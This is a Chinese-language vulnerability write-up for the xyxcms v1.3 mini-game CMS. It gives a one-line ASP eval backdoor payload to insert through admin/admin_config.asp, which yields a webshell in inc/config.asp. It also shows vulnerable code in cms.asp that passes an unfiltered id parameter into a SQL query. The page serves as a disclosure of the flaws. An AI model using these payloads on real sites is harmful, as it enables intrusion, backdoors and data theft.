xyxcms v1.3 小游戏CMS 漏洞说明

所属分类：网络安全 / 漏洞分析阅读数： 205

收藏 0赞 0分享

国内最专业的ASP网站内容管理系统-小游戏管理系统，他将是您轻松建站的首选利器。小游戏CMS系统对站点管理和创造编辑都有好处，无论是CMS系统的易用性和功能的完善性，都处于领先优势！网站的编辑、发布、管理人员可轻松便捷的通过小游戏CMS系统来提交修改、审批、发布内容。

　　[xyxcms]
　　版本信息：V1.3 正式版
　　软件大小：1.66M
　　更新时间：2010年8月6日
　　官方：http://www.xyxcms.com/
　　漏洞文件: cms.asp
　　程序虽小。总会遇到!
　　鄙视挂马者。!
　　学习之用。后果自负。
　　后台拿webshell:
　　admin/admin_config.asp
　　网站地址：插入 ":eval request("1"):'

复制代码

代码如下:

　　inc/config.asp 一句话后门
　　act=request("action")
　　id=trim(request("id"))
　　................'省略
　　if act="getding" then call getding
　　....................'省略
　　sub getding
　　id=request("id") '没过滤
　　set rs=server.createobject("adodb.recordset")
　　sql="select ding from flash where id="&id
　　rs.open sql,conn,1,1
　　if not rs.eof then
　　if isnull(rs(0)) then
　　response.Write(0)
　　else
　　response.Write(rs(0))
　　end if
　　else
　　response.Write(0)
　　end if
　　rs.close
　　set rs=nothing
　　end sub

更多精彩内容其他人还在看

xyxcms v1.3 小游戏CMS 漏洞说明

Uread阅读器拒绝服务漏洞的分析与解决

淇晨科技网站管理系統默认漏洞的分析

Kesion cms注入漏洞分析及其修复方案

中关村在线博客子站SQL注入及修复方案

时时送订单系统后台登陆框post注入的方法介绍以及修复方案

KindEditor上传解析漏洞、列目录、内容漏洞

服务器上网站被挂Iframe木马的解决方法

WordPress 4.0以下版本存在跨站脚本漏洞

历史悠久的3个经典网站安全漏洞介绍

Kindeditor遍历目录0DAY问题

网络赚钱

站长故事